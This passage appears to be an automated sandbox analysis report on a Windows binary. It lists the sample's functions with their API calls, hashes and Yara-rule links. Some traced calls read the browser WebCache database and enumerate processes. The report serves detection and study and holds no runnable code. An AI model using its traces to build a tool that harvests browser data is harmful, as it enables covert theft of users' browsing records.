                                                                                                                                                                  • Opcode ID: 1f1dca71c13544e9ae3cf3bf1a8489d4a1747e82e79b44c055a72dbc52dfabd8
                                                                                                                                                                  • Instruction ID: 5d66eace87880ca3e294b7f0e570a8e3be22b6ae62b10c3d44e19be24f2def2d
                                                                                                                                                                  • Opcode Fuzzy Hash: 1f1dca71c13544e9ae3cf3bf1a8489d4a1747e82e79b44c055a72dbc52dfabd8
                                                                                                                                                                  • Instruction Fuzzy Hash: 89E0B632000249ABDF126F91EC01AAA7F66FF14315F148459FD6C14121D33295B0AF84
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  Function 00444425, Relevance: 1.5, APIs: 1, Instructions: 18COMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  APIs
                                                                                                                                                                  • FreeLibrary.KERNELBASE(?,?,00411BC7,?,?,00403557,?), ref: 00444436
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 0000000B.00000002.302021801.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                  Yara matches
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: FreeLibrary
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID: 3664257935-0
                                                                                                                                                                  • Opcode ID: 323128d68ef13db0835413ed71cea84c0f3745e98266a12d00a9647ca1b2ecc2
                                                                                                                                                                  • Instruction ID: 39ddfc5443798b4b2f471bdaff8db486b4a9363c7739a8bb917076c50ef601e7
                                                                                                                                                                  • Opcode Fuzzy Hash: 323128d68ef13db0835413ed71cea84c0f3745e98266a12d00a9647ca1b2ecc2
                                                                                                                                                                  • Instruction Fuzzy Hash: 92E0F6B5900B008F97308F2BE944506FBF8BEE46103108A1F91AAC2A21C3B4A5498F94
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  Function 004135FF, Relevance: 1.5, APIs: 1, Instructions: 15COMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  APIs
                                                                                                                                                                    • Part of subcall function 00413627: LoadLibraryW.KERNELBASE(psapi.dll,00000000,00413607,00000000,004134F7,00000000,?), ref: 00413632
                                                                                                                                                                    • Part of subcall function 00413627: GetProcAddress.KERNEL32(00000000,GetModuleBaseNameW), ref: 00413646
                                                                                                                                                                    • Part of subcall function 00413627: GetProcAddress.KERNEL32(00000000,EnumProcessModules), ref: 00413652
                                                                                                                                                                    • Part of subcall function 00413627: GetProcAddress.KERNEL32(00000000,GetModuleFileNameExW), ref: 0041365E
                                                                                                                                                                    • Part of subcall function 00413627: GetProcAddress.KERNEL32(00000000,EnumProcesses), ref: 0041366A
                                                                                                                                                                    • Part of subcall function 00413627: GetProcAddress.KERNEL32(00000000,GetModuleInformation), ref: 00413676
                                                                                                                                                                  • K32GetModuleFileNameExW.KERNEL32(00000104,00000000,004134F7,00000104,004134F7,00000000,?), ref: 0041361E
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 0000000B.00000002.302021801.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                  Yara matches
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: AddressProc$FileLibraryLoadModuleName
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID: 3821362017-0
                                                                                                                                                                  • Opcode ID: 115f5329003125d907eaa6c1792e5f10a4de8ddb58c38107801da2991a4e6f4b
                                                                                                                                                                  • Instruction ID: 7bbd5afd8370dadb00360ee8d7667c1b04e34d2617d736b2e99a938255987c13
                                                                                                                                                                  • Opcode Fuzzy Hash: 115f5329003125d907eaa6c1792e5f10a4de8ddb58c38107801da2991a4e6f4b
                                                                                                                                                                  • Instruction Fuzzy Hash: 7CD022312043007BD231EE708C00FCBB3E8BF44711F028C1AB190E2280C3B8C9409308
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  Function 00413401, Relevance: 1.5, APIs: 1, Instructions: 13COMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  APIs
                                                                                                                                                                  • FreeLibrary.KERNELBASE(00000000,00406DBF,?,00000000,?,?,?,?,?,00000000,?), ref: 00413408
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 0000000B.00000002.302021801.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                  Yara matches
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: FreeLibrary
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID: 3664257935-0
                                                                                                                                                                  • Opcode ID: c7bdee4124c4d8ad6a19752b3b65f2382f4191ba04176db7896d06b676d0d792
                                                                                                                                                                  • Instruction ID: 53121aa1ed69e67302caa1b874726051d72530908054280e128cb363a29a4499
                                                                                                                                                                  • Opcode Fuzzy Hash: c7bdee4124c4d8ad6a19752b3b65f2382f4191ba04176db7896d06b676d0d792
                                                                                                                                                                  • Instruction Fuzzy Hash: 51D0C9324005229BDB00AF26EC45B857368EF00351B150025E800BB492D738BEA28ADC
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  Function 0040899C, Relevance: 1.5, APIs: 1, Instructions: 13fileCOMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  APIs
                                                                                                                                                                  • WriteFile.KERNELBASE(00000000,00000000,00000000,00000000,00000000,?,?,0040DDA6,00000000,0044AF64,00000002,?,0040FF40,00000000,00000000,?), ref: 004089B3
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 0000000B.00000002.302021801.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                  Yara matches
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: FileWrite
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID: 3934441357-0
                                                                                                                                                                  • Opcode ID: d35f175962138f83e7c21fa835ff5d24f1ea1e816d258fa8209e89adc734a4dd
                                                                                                                                                                  • Instruction ID: 44b36b217b32540387e14a2368d622af177610148a3238ec1afc6282a592e5c5
                                                                                                                                                                  • Opcode Fuzzy Hash: d35f175962138f83e7c21fa835ff5d24f1ea1e816d258fa8209e89adc734a4dd
                                                                                                                                                                  • Instruction Fuzzy Hash: 64D0C93551020DFFDF01CF80DD06FDE7B7DEB04359F104054BA0495060C7B59A10AB54
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  Function 00407D7B, Relevance: 1.5, APIs: 1, Instructions: 10fileCOMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  APIs
                                                                                                                                                                  • CreateFileW.KERNELBASE(00000000,80000000,00000003,00000000,00000003,00000000,00000000,00444305,00000000,?,00000000,00000000,0041274B,?,?), ref: 00407D8D
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 0000000B.00000002.302021801.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                  Yara matches
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: CreateFile
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID: 823142352-0
                                                                                                                                                                  • Opcode ID: 8208bc6edc164ae96c82fd775a2941fa10469c8b98cafac607abb3fbe20ee729
                                                                                                                                                                  • Instruction ID: 729bcb02508df23f9412a42fb8e8b3188fed1bd1f0cd2b7b0f8edc4fa6246a8f
                                                                                                                                                                  • Opcode Fuzzy Hash: 8208bc6edc164ae96c82fd775a2941fa10469c8b98cafac607abb3fbe20ee729
                                                                                                                                                                  • Instruction Fuzzy Hash: E3C092B4240201BEFF228B10ED15F36295CD740700F2044247E00E80E0D1A04E108924
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  Function 00407D94, Relevance: 1.5, APIs: 1, Instructions: 10fileCOMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  APIs
                                                                                                                                                                  • CreateFileW.KERNELBASE(00000000,40000000,00000001,00000000,00000002,00000000,00000000,0040DD67,00000000,?,0040FF40,00000000,00000000,?,00000000,00000000), ref: 00407DA6
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 0000000B.00000002.302021801.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                  Yara matches
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: CreateFile
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID: 823142352-0
                                                                                                                                                                  • Opcode ID: e4fb0def6ce664a06b79152cf56c2ddeab2622e766aaf14104048769dc5d2c9c
                                                                                                                                                                  • Instruction ID: edb615435fe3ce855b8554d9524e6f242ae4b45eb81851bd3d2393cb7dc29c83
                                                                                                                                                                  • Opcode Fuzzy Hash: e4fb0def6ce664a06b79152cf56c2ddeab2622e766aaf14104048769dc5d2c9c
                                                                                                                                                                  • Instruction Fuzzy Hash: 67C012F43503017FFF208B10AD0AF37395DD780700F1084207F00E80E1D2E14C008924
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  Function 00409552, Relevance: 1.5, APIs: 1, Instructions: 9COMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  APIs
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 0000000B.00000002.302021801.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                  Yara matches
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: ??3@
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID: 613200358-0
                                                                                                                                                                  • Opcode ID: f17d17a82e7eff4c361624d86b7f249207a7f80e03ad9ec9b6aa2e80ce8aa672
                                                                                                                                                                  • Instruction ID: 664dc763c5da3aaab367392b47211da9bee634dc4adcd4213ebe75a48c3d30fa
                                                                                                                                                                  • Opcode Fuzzy Hash: f17d17a82e7eff4c361624d86b7f249207a7f80e03ad9ec9b6aa2e80ce8aa672
                                                                                                                                                                  • Instruction Fuzzy Hash: 6EC09BB29127015BF7309F66C40471373D85F50767F314C5DA4D1964C1DB7CD5408514
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  Function 00414266, Relevance: 1.5, APIs: 1, Instructions: 8COMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  APIs
                                                                                                                                                                  • EnumResourceNamesW.KERNELBASE(?,?,004141E0,00000000), ref: 00414275
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 0000000B.00000002.302021801.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                  Yara matches
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: EnumNamesResource
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID: 3334572018-0
                                                                                                                                                                  • Opcode ID: 10e677fbce6fd90f0b0892a272ce9856b781f2edb2e34da2307d6f8996e91fc3
                                                                                                                                                                  • Instruction ID: 894f21907dab3ca3b917dc931ff3d8bd940b81db11264512214ff9c0d0df685d
                                                                                                                                                                  • Opcode Fuzzy Hash: 10e677fbce6fd90f0b0892a272ce9856b781f2edb2e34da2307d6f8996e91fc3
                                                                                                                                                                  • Instruction Fuzzy Hash: 23C09B35654341A7C7029F109C0DF1E7EA5BB95705F504C29B151940A0C75251549609
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  Function 00409428, Relevance: 1.5, APIs: 1, Instructions: 8COMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  APIs
                                                                                                                                                                  • FindClose.KERNELBASE(?,0040933E,?,00000000,?,004127ED,*.*,?), ref: 00409432
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 0000000B.00000002.302021801.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                  Yara matches
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: CloseFind
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID: 1863332320-0
                                                                                                                                                                  • Opcode ID: 0ad1f9dc815212ba49355cece8123c874f6c433bcb3a33917fc8ecdda60dda50
                                                                                                                                                                  • Instruction ID: 3bd61d94ea2d0ebbf22c21a92135ad1df5e9ea430364887b997a0a3dbe6c7a02
                                                                                                                                                                  • Opcode Fuzzy Hash: 0ad1f9dc815212ba49355cece8123c874f6c433bcb3a33917fc8ecdda60dda50
                                                                                                                                                                  • Instruction Fuzzy Hash: 3EC048345109018BD6289F38986A52A77A0AA5A3303A44F6CA0F2920E2E73888428A04
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  Function 00413ACB, Relevance: 1.5, APIs: 1, Instructions: 8COMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  APIs
                                                                                                                                                                  • FreeLibrary.KERNELBASE(?,0040ADDC), ref: 00413AD7
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 0000000B.00000002.302021801.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                  Yara matches
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: FreeLibrary
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID: 3664257935-0
                                                                                                                                                                  • Opcode ID: ae408aea655b612f84878290bbe666c5974634203696d3986710f65fc614f927
                                                                                                                                                                  • Instruction ID: 95e4874612f61a4c2f5820174f699a9a2e50adc9900ffd5901b80c85968e45e3
                                                                                                                                                                  • Opcode Fuzzy Hash: ae408aea655b612f84878290bbe666c5974634203696d3986710f65fc614f927
                                                                                                                                                                  • Instruction Fuzzy Hash: 7BC04C35510B118BEF218B12C989793B3E4AF00757F40C818949685851D77CE454CE18
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  Function 00408250, Relevance: 1.5, APIs: 1, Instructions: 7COMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  APIs
                                                                                                                                                                  • GetFileAttributesW.KERNELBASE(?,0040BC93,?,0040BD4A,00000000,?,00000000,00000208,?), ref: 00408254
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 0000000B.00000002.302021801.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                  Yara matches
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: AttributesFile
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID: 3188754299-0
                                                                                                                                                                  • Opcode ID: 4382bcffcdb6742439dfbf3a6db9824b907b5495e43b5b320ff748ce3f5f7401
                                                                                                                                                                  • Instruction ID: 7aa4b53cbdd50d27f0544b0d73f3b09e9b9e978b4a3a64aa4ec168f40bbc8e5c
                                                                                                                                                                  • Opcode Fuzzy Hash: 4382bcffcdb6742439dfbf3a6db9824b907b5495e43b5b320ff748ce3f5f7401
                                                                                                                                                                  • Instruction Fuzzy Hash: 89B012B92104005BCF0807349C4904D36505F456317300B3CB033C01F0D730CCA0BA00
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  Function 00413E4F, Relevance: 1.5, APIs: 1, Instructions: 7registryCOMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  APIs
                                                                                                                                                                  • RegOpenKeyExW.KERNELBASE(80000002,80000002,00000000,00020019,80000002,004145EB,80000002,Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders,?), ref: 00413E62
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 0000000B.00000002.302021801.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                  Yara matches
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: Open
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID: 71445658-0
                                                                                                                                                                  • Opcode ID: beaa972787324bac86b0054d7d1e8ed04957e390a170dd16c4c1fd7d277969b5
                                                                                                                                                                  • Instruction ID: 06f107d5783c69a41ddb44c60f44fa238db6365feab173ebf779541cd7ebc08f
                                                                                                                                                                  • Opcode Fuzzy Hash: beaa972787324bac86b0054d7d1e8ed04957e390a170dd16c4c1fd7d277969b5
                                                                                                                                                                  • Instruction Fuzzy Hash: E1C09B39544301BFDF114F40FE05F09BB61AB84F05F004414B344240B282714414EB57
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  Function 0041B76D, Relevance: 1.3, APIs: 1, Instructions: 99COMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 0000000B.00000002.302021801.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                  Yara matches
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID:
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID:
                                                                                                                                                                  • Opcode ID: 6f77371c8789c3266b9f1932ef178477fe063e167a465118b7ddcb6402bacfed
                                                                                                                                                                  • Instruction ID: fa567e0f167378dcabf243c4c44df542d601d1aca3ea04bf4c0b19c361688719
                                                                                                                                                                  • Opcode Fuzzy Hash: 6f77371c8789c3266b9f1932ef178477fe063e167a465118b7ddcb6402bacfed
                                                                                                                                                                  • Instruction Fuzzy Hash: 1A317C31901216EFDF14AF25D9817DA73A4FF00B55F14412BF825AB280DB38EDA08BD9
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  Function 00405DEB, Relevance: 1.3, APIs: 1, Instructions: 59COMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  APIs
                                                                                                                                                                    • Part of subcall function 00409539: ??2@YAPAXI@Z.MSVCRT ref: 00409542
                                                                                                                                                                    • Part of subcall function 004057D2: SetFilePointerEx.KERNELBASE(004057A8,?,?,00000000,00000000,00000000,00405E25,00000000,00000000,?,00000000,004057A8), ref: 004057EE
                                                                                                                                                                  • memcpy.MSVCRT ref: 00405E6E
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 0000000B.00000002.302021801.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                  Yara matches
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: ??2@FilePointermemcpy
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID: 609303285-0
                                                                                                                                                                  • Opcode ID: 69c5ce9f8364cb3a2f3d9952414f58f868eb9a31ba510d0c6d062cd66918fe31
                                                                                                                                                                  • Instruction ID: b6d0ac0748dce8c6543b82d29fb895a5afc24863716f8b43ab814fbacadff293
                                                                                                                                                                  • Opcode Fuzzy Hash: 69c5ce9f8364cb3a2f3d9952414f58f868eb9a31ba510d0c6d062cd66918fe31
                                                                                                                                                                  • Instruction Fuzzy Hash: 2F11B272500908BBD711A755C844F9F77ACEF84318F15807BF94573182C738AE068BE9
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  Function 004060BC, Relevance: 1.3, APIs: 1, Instructions: 56COMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  APIs
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 0000000B.00000002.302021801.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                  Yara matches
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: _wcsicmp
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID: 2081463915-0
                                                                                                                                                                  • Opcode ID: 5d18b3e2f7875cbfa1b7883ec22a938669b6fc3c83f0355837b3f79f1fd7a5de
                                                                                                                                                                  • Instruction ID: 08e2259bb844cdb7583518af71a3b249da553f2a004d57c4b783ea4beab812a3
                                                                                                                                                                  • Opcode Fuzzy Hash: 5d18b3e2f7875cbfa1b7883ec22a938669b6fc3c83f0355837b3f79f1fd7a5de
                                                                                                                                                                  • Instruction Fuzzy Hash: 3B118871600605AFDB10DF65C8C199AB7F8FF04314F11853EE416E7281EB34F9158B68
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  Function 00415471, Relevance: 1.3, APIs: 1, Instructions: 53COMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 0000000B.00000002.302021801.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                  Yara matches
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID:
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID:
                                                                                                                                                                  • Opcode ID: 0c41fac1026caa394f1d8b7ace6411e333aacae98e81f6c1a106480c6c3d5a56
                                                                                                                                                                  • Instruction ID: e0041a49ab5f8a8a6f79e1cdbe6ba366fc772cb499ee81fd5c165662a01707c3
                                                                                                                                                                  • Opcode Fuzzy Hash: 0c41fac1026caa394f1d8b7ace6411e333aacae98e81f6c1a106480c6c3d5a56
                                                                                                                                                                  • Instruction Fuzzy Hash: 38F0D1B6308E02EAE320252659807FB029ADBC039BB24442FF949C6242EE7CCCC55229
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  Function 00405740, Relevance: 1.3, APIs: 1, Instructions: 39COMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  APIs
                                                                                                                                                                    • Part of subcall function 004057C0: CloseHandle.KERNEL32(000000FF,00405750,00000000,?,00409A41,00000000,00000000,00000104,Microsoft\Windows\WebCache\WebCacheV01.dat,?,?,?,00409F26,?,0040A0FE,000000FF), ref: 004057C8
                                                                                                                                                                    • Part of subcall function 00407D7B: CreateFileW.KERNELBASE(00000000,80000000,00000003,00000000,00000003,00000000,00000000,00444305,00000000,?,00000000,00000000,0041274B,?,?), ref: 00407D8D
                                                                                                                                                                  • GetLastError.KERNEL32(00000000,?,00409A41,00000000,00000000,00000104,Microsoft\Windows\WebCache\WebCacheV01.dat,?,?,?,00409F26,?,0040A0FE,000000FF,00000000,00000104), ref: 004057AD
                                                                                                                                                                    • Part of subcall function 0040897D: ReadFile.KERNELBASE(?,?,CCD,00000000,00000000,?,?,00444343,00000000,00000000), ref: 00408994
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 0000000B.00000002.302021801.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                  Yara matches
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: File$CloseCreateErrorHandleLastRead
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID: 2136311172-0
                                                                                                                                                                  • Opcode ID: 81d98ab7555efe12e5c8b48e24a2d6677c0216f0edfc1775a14d27b6400d9af5
                                                                                                                                                                  • Instruction ID: 00704370d8ec878584a64fe5f9f18aab24b7d249e6cd1ef38c395e5c556ec921
                                                                                                                                                                  • Opcode Fuzzy Hash: 81d98ab7555efe12e5c8b48e24a2d6677c0216f0edfc1775a14d27b6400d9af5
                                                                                                                                                                  • Instruction Fuzzy Hash: 190181B5415A00DFE7205B30C905BA776E8EF51315F10893FE595E72C1EB7C9480DAAE
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  Function 00409539, Relevance: 1.3, APIs: 1, Instructions: 12COMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  APIs
                                                                                                                                                                    • Part of subcall function 00409552: ??3@YAXPAX@Z.MSVCRT ref: 00409559
                                                                                                                                                                  • ??2@YAPAXI@Z.MSVCRT ref: 00409542
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 0000000B.00000002.302021801.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                  Yara matches
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: ??2@??3@
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID: 1936579350-0
                                                                                                                                                                  • Opcode ID: afed82952d0e9bcea28b6882f33bad89db067c3a9bda0bf3c4f02441038791aa
                                                                                                                                                                  • Instruction ID: 8918756149df837d9eea435be632a3e0a17df07a668273fb2c59ff5331204d46
                                                                                                                                                                  • Opcode Fuzzy Hash: afed82952d0e9bcea28b6882f33bad89db067c3a9bda0bf3c4f02441038791aa
                                                                                                                                                                  • Instruction Fuzzy Hash: 2BC08C724182100AD650FF79280205622D49E82320301882FE091E3142D53848014344
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  Function 0040B1BF, Relevance: 1.3, APIs: 1, Instructions: 10COMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  APIs
                                                                                                                                                                  • free.MSVCRT(00000000,00410160,/deleteregkey,/savelangfile,?,?,?,?,00000002,?,004448C6,00000000,?,0000000A), ref: 0040B1C6
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 0000000B.00000002.302021801.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                  Yara matches
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: free
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID: 1294909896-0
                                                                                                                                                                  • Opcode ID: ca48b363025fd7f42afa8552a353c3ae8abba493304229bf9adae34e8f70245b
                                                                                                                                                                  • Instruction ID: def78aeb235da03500d5bf48ca01037dd20a397eb60980b6de46ef9d9da7be76
                                                                                                                                                                  • Opcode Fuzzy Hash: ca48b363025fd7f42afa8552a353c3ae8abba493304229bf9adae34e8f70245b
                                                                                                                                                                  • Instruction Fuzzy Hash: ACC01272420B018FF7209E11C406722B3E4EF0077BF618C0D909481482C77CD4408A48
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  Function 00408F1E, Relevance: 1.3, APIs: 1, Instructions: 10COMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  APIs
                                                                                                                                                                  • free.MSVCRT(00000000,004092A3,00000000,?,00000000), ref: 00408F25
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 0000000B.00000002.302021801.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                  Yara matches
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: free
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID: 1294909896-0
                                                                                                                                                                  • Opcode ID: 3eb1e8d1b89ea51a5407810e4ab9f4a69700e84ea5e736543a1eb2ef7f6bf350
                                                                                                                                                                  • Instruction ID: eebb639015016b4d35185c1cf15d7584ef51e0a9315dec3cbabf5363aa789e86
                                                                                                                                                                  • Opcode Fuzzy Hash: 3eb1e8d1b89ea51a5407810e4ab9f4a69700e84ea5e736543a1eb2ef7f6bf350
                                                                                                                                                                  • Instruction Fuzzy Hash: C5C0127A4107028BF7308F21C509322B2E5AF0072BF708C0D90D081482CB7CD0808A08
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  Function 00414C5E, Relevance: 1.3, APIs: 1, Instructions: 5COMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  APIs
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 0000000B.00000002.302021801.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                  Yara matches
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: free
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID: 1294909896-0
                                                                                                                                                                  • Opcode ID: e750de9405b69b73a16e34a7c973d61e0a85f8dff2a96d7ff9c71a90812ce4fe
                                                                                                                                                                  • Instruction ID: c34dd2395d73de7fd8324248a47ac8fcc6ed20e97332430ae650d69d176587ff
                                                                                                                                                                  • Opcode Fuzzy Hash: e750de9405b69b73a16e34a7c973d61e0a85f8dff2a96d7ff9c71a90812ce4fe
                                                                                                                                                                  • Instruction Fuzzy Hash: C8900286455511116C0425756C0760911480892176335074A7032959D1CE1C8150601C
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  Non-executed Functions

                                                                                                                                                                  Function 00443A61, Relevance: 66.7, APIs: 23, Strings: 15, Instructions: 152libraryloaderCOMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  APIs
                                                                                                                                                                  • memset.MSVCRT ref: 00443A8C
                                                                                                                                                                  • wcscpy.MSVCRT ref: 00443AA3
                                                                                                                                                                  • memset.MSVCRT ref: 00443AD6
                                                                                                                                                                  • wcscpy.MSVCRT ref: 00443AEC
                                                                                                                                                                  • wcscat.MSVCRT ref: 00443AFD
                                                                                                                                                                  • wcscpy.MSVCRT ref: 00443B23
                                                                                                                                                                  • wcscat.MSVCRT ref: 00443B34
                                                                                                                                                                  • wcscpy.MSVCRT ref: 00443B5B
                                                                                                                                                                  • wcscat.MSVCRT ref: 00443B6C
                                                                                                                                                                  • GetModuleHandleW.KERNEL32(?,?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 00443B7B
                                                                                                                                                                  • LoadLibraryExW.KERNEL32(?,00000000,00000008,?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 00443B92
